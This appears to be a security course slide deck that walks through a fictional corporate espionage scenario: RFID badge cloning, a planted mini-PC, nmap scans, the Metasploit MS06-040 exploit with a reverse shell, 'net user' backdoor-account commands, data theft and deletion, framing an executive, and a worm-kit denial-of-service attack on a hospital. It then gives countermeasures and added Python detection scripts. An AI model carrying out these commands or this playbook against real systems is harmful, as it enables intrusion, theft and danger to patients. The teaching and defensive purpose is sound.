Corporate Espionage. Competitor of Alki Pharmaceuticals wants to get any technical information or...

Tel 283 Corporate Espionage

Page 1: Tel 283 Corporate Espionage

Page 2: Background

Competitor of Alki Pharmaceuticals wants to get any technical information or research
Not have the hack traced back
Launch a disabling attack on the hospital across from Alki
  ◦ Critical services impacted, resulting in patient death
“Contractor” threatened hacker’s girlfriend
  ◦ Eight weeks allowed for the hack

Page 3: Cost of corporate espionage

1999: $25 Billion
  ◦ US Chamber of Commerce survey
2003: $89 Billion from the Fortune 1000 companies
  ◦ PricewaterhouseCoopers and ASIS (American Society for Industrial Security) survey
2007: $100 Billion plus

Page 4: The Exploit

Reconnaissance
Physical Access
Executing the Hacks
DoS of Hospital
Other “stuff”

Page 5: Recon

Google search
  ◦ “intext:alki pharmaceuticals”
  ◦ Mentions software vendor for Alki
Get info from vendor’s webpage
  ◦ Technical documentation
  ◦ Type of servers
  ◦ Ports
  ◦ Technical forum: SA from Alki complaining about software’s restrictions
Physical recon
  ◦ Employees have RFID badges
www.sec.gov
  ◦ EDGAR search on publicly traded corporations

Page 6: RFIDIOt

Python libraries for reading RFID devices
Readers are available for purchase
  ◦ Depending on standard, anywhere from $50 to $1000
A writer will clone a valid RFID device
Phoenix met official of Alki
  ◦ Got physically close enough to read her badge
  ◦ Now has access to every place the CFO is allowed

Page 7: Social engineering

CFO takes “prospective employee” on tour
  ◦ Observes which areas are carded
  ◦ Reads cards of 15 employees, remembering the order of cards being read and locations
  ◦ Will attempt to get a janitor’s RFID card as well

Page 8: Tools

Mini-PC with Vista
  ◦ VMWare running Knoppix Live CD ISO
  ◦ Integrated CDMA-EVO cellular card
  ◦ Integrated 10/100 Ethernet NIC
Phoenix hopes to plant the mini-PC physically at Alki
  ◦ Get IP via DHCP
  ◦ Connect to Internet using the cellular card
Using Hotmail account traceable back to Alki employee (backup email account points back to the employee)
  ◦ Set up GoToMyPC trial account
Physical intrusion set for when janitors start night services

Page 9: Intrusion

Phoenix takes elevator (using cloned CFO’s card) and enters the NOC room
  ◦ Uses card to enter the NOC room: no biometrics in place!
  ◦ Racks are neatly labeled indicating which units are R&D switches

Page 10: Intrusion

Phoenix plugs patch cable into an open port on R&D switch
  ◦ Attaches the mini-PC to the switch
  ◦ Gets an IP via DHCP
Boots up the Knoppix Live CD ISO under VMWare
  ◦ ifconfig reveals a supplied IP address of 10.0.0.6
Going back to the host OS (Vista), he fires up the CDMA software
  ◦ GoToMyPC is connected to the Internet
  ◦ Secretes the mini-PC and the power supply
  ◦ Takes a wireless access point, with an Alki inventory control tag, and leaves

Page 11: Intrusion

On the train going home Phoenix uses a CDMA connection on his laptop to verify a connection
  ◦ Brings up a web browser
  ◦ Utilizing the CFO’s bogus account, logs into www.gotomypc.com
  ◦ Connects to the planted mini-PC in the Alki NOC room

Page 12: Intrusion

On returning home, reconnects using GoToMyPC
  ◦ Goes to the VMWare and in the shell starts up Nmap
nmap 10.0.0.0/24
  ◦ Shows the hosts and which ports are listening on these hosts
  ◦ 10.0.0.14 shows port 12345, which was the port the R&D server listens on (info developed through passive intel gathering)
nmap -A 10.0.0.14 -p 12345
  ◦ Attempts to uncover the OS
  ◦ Response is either XP / SP2 or Windows Server 2003
  ◦ Directory Services ports are open: probably a Windows Server 2003 host

Page 13: Intrusion

Recalling complaints about vendor’s software being incapable of working with SP1
  ◦ www.microsoft.com/security
  ◦ Search for SP1 fixes: MS06-040, netapi32.dll exploitable
Uses Metasploit to see if there’s an available exploit
  ◦ use windows/smb/ms06_040_netapi
  ◦ Gets the Metasploit prompt: msf exploit(ms06_040_netapi) >

Page 14: Metasploit

At the Metasploit prompt:
  set PAYLOAD generic/shell_reverse_tcp
  set RHOST 10.0.0.14
  set LHOST 10.0.0.6
Phoenix now sees the following on his screen:
  C:\WINDOWS\system32>
Phoenix has access to the target system!

Page 15: Intrusion: Target Access

Phoenix is on the target system with Local System privilege
  ◦ Higher than Administrator!!!
Once on the target system Phoenix enters the following commands at the prompt
  ◦ net user linda alki$$ /ADD (Linda is the CFO)
  ◦ net localgroup administrators linda /ADD
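Added example (not from the slide deck or the case it summarises): a small Python correlator that flags, from the Windows Security log, exactly the pattern the two commands above leave behind on the R&D server, a local account created and then placed in Administrators moments later, by a process running as SYSTEM rather than by a named administrator. The event IDs are the real Security-log IDs (624/636 on Windows 2000/XP/2003, 4720/4732 on Vista/2008 and later); the log records, host names and the watched-group list are constructed assumptions.

```python
"""Correlate account creation with privileged-group additions (added example)."""
from datetime import datetime, timedelta

ACCOUNT_CREATED = {624, 4720}        # "user account created" (2000/XP/2003 and Vista+ IDs)
ADDED_TO_LOCAL_GROUP = {636, 4732}   # "member added to security-enabled local group"
# Assumption: local groups whose membership changes are worth an alert
WATCHED_GROUPS = {"administrators", "backup operators", "remote desktop users"}

# Constructed Security-log records (dicts standing in for parsed EVT/EVTX events).
# The first two mirror "net user linda ... /ADD" followed by
# "net localgroup administrators linda /ADD" run from a SYSTEM shell.
SAMPLE_EVENTS = [
    {"time": "2007-03-01 22:14:05", "id": 624, "subject": "NT AUTHORITY\\SYSTEM",
     "target": "linda", "group": None, "host": "RDSRV01"},
    {"time": "2007-03-01 22:14:20", "id": 636, "subject": "NT AUTHORITY\\SYSTEM",
     "target": "linda", "group": "Administrators", "host": "RDSRV01"},
    {"time": "2007-03-02 09:01:00", "id": 4720, "subject": "ALKI\\itadmin",
     "target": "svc_backup", "group": None, "host": "FS02"},
    {"time": "2007-03-05 09:30:00", "id": 4732, "subject": "ALKI\\itadmin",
     "target": "svc_backup", "group": "Backup Operators", "host": "FS02"},
]


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def correlate(events, window=timedelta(minutes=30)):
    """Walk events in time order and return a list of alert dicts.

    high:   account added to a watched group within `window` of being created
    medium: any other watched-group addition, or a creation performed as LocalSystem
    """
    created = {}   # (host, account) -> creation time
    alerts = []
    for ev in sorted(events, key=lambda e: _ts(e["time"])):
        when = _ts(ev["time"])
        key = (ev["host"], ev["target"].lower())
        if ev["id"] in ACCOUNT_CREATED:
            created[key] = when
            if ev["subject"].upper().endswith("\\SYSTEM"):
                # an admin creating accounts interactively is logged under their own
                # name; a creation attributed to LocalSystem points at code running as SYSTEM
                alerts.append({"host": ev["host"], "account": ev["target"],
                               "severity": "medium",
                               "reasons": ["account created by LocalSystem"]})
        elif ev["id"] in ADDED_TO_LOCAL_GROUP and (ev["group"] or "").lower() in WATCHED_GROUPS:
            reasons = [f"added to local group {ev['group']} by {ev['subject']}"]
            severity = "medium"
            if key in created and when - created[key] <= window:
                age = int((when - created[key]).total_seconds())
                reasons.append(f"account was created only {age}s earlier")
                severity = "high"
            alerts.append({"host": ev["host"], "account": ev["target"],
                           "severity": severity, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(f"[{alert['severity'].upper()}] {alert['host']} {alert['account']}: "
              + "; ".join(alert["reasons"]))
```

The same logic works on a central log collector as long as the host name travels with the event; on the sample data the constructed "linda" pair scores high while the three-day-old service account addition only scores medium.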

Page 16: Intrusion: Hospital

Phoenix walks into the hospital and locates a room with available Ethernet plugs near the ER
  ◦ Gets IP address
  ◦ Plugs in the stolen Alki wireless access point
  ◦ Resets the AP to factory defaults
  ◦ Configures it to support DHCP
  ◦ Verifies that he can connect via the AP
  ◦ Jacks the laptop into Ethernet port
Runs nmap 10.10.10.0/24
  ◦ Response is 12 hosts, possibly all in ER due to proximity
Maps out the OS on each host
  ◦ Results go to ADS text file: nmap -A 10.10.10.0/24 > c:\OSDetect.txt:ads.txt

Page 17: Intrusion: Hospital

The laptop was purchased with cash with false information supplied at a computer “superstore”
  ◦ Laptop loaded with viruses, virus construction kit, recon tools, etc.
Using the laptop
  ◦ Phoenix logged into the Hotmail account (posing as CFO from Alki), leaving the “remember me” settings on (making investigators’ job easier)
  ◦ Sent/received emails asking for help on scanning, creating viruses and exploiting unpatched PCs
  ◦ Visited websites, leaving history on PC
Verifies that the rogue access point functions from outside the hospital

Page 18: Intrusion: Alki

R&D server partitions mapped out
  ◦ C: system partition
  ◦ D: data partition, shared by researchers
Over a network connection a network share is established to a 1 TB drive attached
  ◦ Windows “Backup” of D: on the target system to the 1 TB drive
Physical entry back into Alki NOC room
  ◦ Using the mini-PC and Remote Desktop: data partition deleted from D:, Windows system directory deleted from C:

Page 19: DoS: Hospital

From coffee shop next to the hospital, Phoenix uses Remote Desktop to connect to the mini-PC in the hospital and executes “wshwc.exe”
  ◦ Windows Scripting Host Worm Construction program

Page 20: DoS: Hospital

WSHWC
  ◦ Names the worm Alkibot
  ◦ Payload option: Launch Denial of Service Attack
  ◦ Creates a separate worm for each of the 7 Unix (Solaris) hosts identified using nmap
These .vbs files, along with 5 additional .vbs files for the other Windows boxes, are saved on the laptop
Bat file constructed to execute the .vbs files sequentially
  ◦ Executes the bat file

Page 21: DoS: Hospital

News reports
  ◦ ER monitoring units (Solaris systems) were not able to send data out
      Resulted in cardiac arrest of 1 patient
      Incorrect medication prescribed to another patient
      Drips ran out for two other patients
  ◦ Alki executive arrested (CFO)
  ◦ Alki stock value sharply down
  ◦ Alki competitor announced they were ahead of schedule in release of drug

Page 22: Other options

Breach of confidentiality of employee information
Creation of backdoors, shell account
  ◦ Sell these
Access to Alki’s banking information (Accounting dept.)
Stock manipulation

Page 23: Summary

Detailed tech info of Alki software uncovered by going to vendor’s site
RFID attack assisted in gaining physical access to Alki
  ◦ Bolstered by social engineering
Nmap scan identified Alki R&D server
Microsoft.com used to uncover potential exploits for the server
Metasploit used to invoke the exploit
Windows Backup used to copy R&D data remotely using network share
Delete of data (getting rid of evidence, causing diversion)
Hotmail account set up to implicate CFO
Set up rogue AP in hospital, launched DoS attack

Page 24: Countermeasures

Physical security
  ◦ Single factor access to restricted areas: implement multi-layer measures
  ◦ Note: Encryption of the RFID means nothing if it’s cloned, as the attacker does not need to “read” the data, just use it
  ◦ Cameras / CCTV should be used
  ◦ Access device should not also be the ID card: ID card is visible, RFID device should be in a shielded carrier
  ◦ Disable open ports on a switch
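Added example (not the deck’s own material): the open switch port handed the planted mini-PC a DHCP lease for 10.0.0.6, so a routine check of leases on the R&D scope against the asset inventory is a cheap detective control to pair with disabling unused ports. The script is Python; the inventory, the log lines, and the assumption that the log follows the Windows DHCP server audit-log column order (ID, Date, Time, Description, IP Address, Host Name, MAC Address) are all mine.

```python
"""Audit DHCP leases on a sensitive scope against the asset inventory (added example)."""
import csv
import io
import ipaddress

# Constructed asset inventory: MAC (no separators, upper case) -> (asset name, expected network)
INVENTORY = {
    "001B2122AABB": ("RDSRV01", "10.0.0.0/24"),
    "001B2122AACC": ("RDWS-07", "10.0.0.0/24"),
    "00A0C9FFEE01": ("NOC-PRINTER", "10.0.5.0/24"),
}

# Constructed lines in the Windows DHCP server audit-log layout:
#   ID,Date,Time,Description,IP Address,Host Name,MAC Address
# ID 10 = new lease, 11 = renewal. The first line is what a planted box booting a
# Knoppix VM would produce (00:0C:29 is a VMware OUI); the rest are ordinary traffic.
SAMPLE_DHCP_LOG = """\
10,03/01/07,22:09:55,Assign,10.0.0.6,knoppix,000C29A1B2C3
11,03/01/07,22:10:02,Renew,10.0.0.14,RDSRV01,001B2122AABB
10,03/01/07,22:12:30,Assign,10.0.0.31,RDWS-07,001B2122AACC
10,03/01/07,22:15:10,Assign,10.0.0.40,NOC-PRINTER,00A0C9FFEE01
"""


def audit_leases(log_text, inventory, scope="10.0.0.0/24"):
    """Return one finding per lease on `scope` that the inventory cannot vouch for."""
    net = ipaddress.ip_network(scope)
    findings = []
    for row in csv.reader(io.StringIO(log_text)):
        if len(row) < 7 or row[0] not in ("10", "11"):
            continue                      # not a lease/renew record
        ip = ipaddress.ip_address(row[4].strip())
        if ip not in net:
            continue                      # other scopes are outside this check
        host, mac = row[5].strip(), row[6].strip().upper()
        asset = inventory.get(mac)
        if asset is None:
            # unknown hardware on the R&D scope: the planted mini-PC case
            findings.append({"ip": str(ip), "mac": mac, "host": host,
                             "reason": "MAC not in asset inventory"})
        elif ip not in ipaddress.ip_network(asset[1]):
            # known hardware, but plugged into a network it has no business on
            findings.append({"ip": str(ip), "mac": mac, "host": host,
                             "reason": f"inventoried as {asset[0]}, expected on {asset[1]}"})
    return findings


if __name__ == "__main__":
    for f in audit_leases(SAMPLE_DHCP_LOG, INVENTORY):
        print(f"{f['ip']:<12} {f['mac']} {f['host']:<12} {f['reason']}")
```

This is a detective control only: a device with a spoofed MAC would pass it, which is why the deck’s preventive advice (shut down unused ports) comes first and the lease audit is the safety net behind it.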

Page 25: Countermeasures

Scanning attack
  ◦ Turn off ICMP
  ◦ Turn on Windows Firewall
      Simple nmap scans would come back with no results
      Possible to get results, just more complex scans
  ◦ Client IDS: Cisco Security Agent (CSA)
      Detects SYN stealth scans, for example
      Perhaps make it impossible to determine which host was the R&D server
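Added example (not from the deck): once Windows Firewall is on and logging dropped packets (the logging switch is off by default), the nmap sweep of 10.0.0.0/24 and the follow-up probe of 10.0.0.14 from Page 12 show up as bursts of dropped SYNs in pfirewall.log. The Python below parses that log format and flags a source that touches many ports on one host (vertical scan) or one port on many hosts (sweep) inside a one-minute window. The log lines and the thresholds are constructed assumptions; the field order is the real W3C-style header Windows Firewall writes.

```python
"""Detect port scans and host sweeps in Windows Firewall (pfirewall.log) output (added example)."""
from collections import defaultdict
from datetime import datetime

_HEADER = """#Version: 1.5
#Software: Microsoft Windows Firewall
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
"""
_PORTS = [21, 22, 23, 25, 80, 135, 139, 445, 3389, 12345]

# Constructed log: a vertical scan of 10.0.0.14, a sweep of port 12345 across ten hosts,
# a workstation retrying SMB to the same server, and one dropped ping.
SAMPLE_LOG = _HEADER + "\n".join(
    [f"2007-03-01 22:10:{i:02d} DROP TCP 10.0.0.6 10.0.0.14 {41000 + i} {p} 48 S {1000 + i} 0 65535 - - - RECEIVE"
     for i, p in enumerate(_PORTS)]
    + [f"2007-03-01 22:11:{i:02d} DROP TCP 10.0.0.6 10.0.0.{i + 1} {42000 + i} 12345 48 S {2000 + i} 0 65535 - - - RECEIVE"
       for i in range(10)]
    + [f"2007-03-01 22:10:3{i} DROP TCP 10.0.0.22 10.0.0.14 5000{i} 445 48 S {3000 + i} 0 65535 - - - RECEIVE"
       for i in range(3)]
    + ["2007-03-01 22:10:40 DROP ICMP 10.0.0.6 10.0.0.14 - - 60 - - - - 8 0 - RECEIVE"]
)


def parse_log(text):
    """Turn pfirewall.log lines into dicts; '#' lines are directives and are skipped."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split()
        if len(f) < 8:
            continue
        records.append({
            "time": datetime.strptime(f[0] + " " + f[1], "%Y-%m-%d %H:%M:%S"),
            "action": f[2], "proto": f[3], "src": f[4], "dst": f[5],
            "sport": f[6], "dport": f[7],
        })
    return records


def detect_scans(records, window=60, port_threshold=8, host_threshold=8):
    """Group dropped TCP/UDP packets per source into `window`-second buckets and
    report sources that hit many ports on one host or many hosts in a bucket."""
    buckets = defaultdict(set)   # (src, bucket number) -> {(dst, dport)}
    for r in records:
        if r["action"] != "DROP" or r["proto"] not in ("TCP", "UDP"):
            continue
        bucket = int(r["time"].timestamp()) // window
        buckets[(r["src"], bucket)].add((r["dst"], r["dport"]))

    findings = []
    for (src, _), pairs in sorted(buckets.items()):
        per_dst = defaultdict(set)
        for dst, port in pairs:
            per_dst[dst].add(port)
        for dst, ports in per_dst.items():
            if len(ports) >= port_threshold:
                findings.append({"src": src, "kind": "port scan", "target": dst, "distinct": len(ports)})
        if len(per_dst) >= host_threshold:
            findings.append({"src": src, "kind": "host sweep", "target": "*", "distinct": len(per_dst)})
    return findings


if __name__ == "__main__":
    for f in detect_scans(parse_log(SAMPLE_LOG)):
        print(f"{f['src']} {f['kind']} -> {f['target']} ({f['distinct']} distinct)")
```

Tumbling one-minute buckets are deliberately simple; a scan that straddles a bucket boundary can be split below threshold, so a production rule would use a sliding window or feed the same counts into the host IDS the slide recommends.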

Page 26: Countermeasures

Social Engineering
  ◦ Training!
  ◦ Policies
  ◦ Testing of policies
OS attacks
  ◦ Patching
      Pressure vendor to fix application to work with later release of OS which is patched
      Consider another software solution (dump the vendor)
Data theft
  ◦ Encryption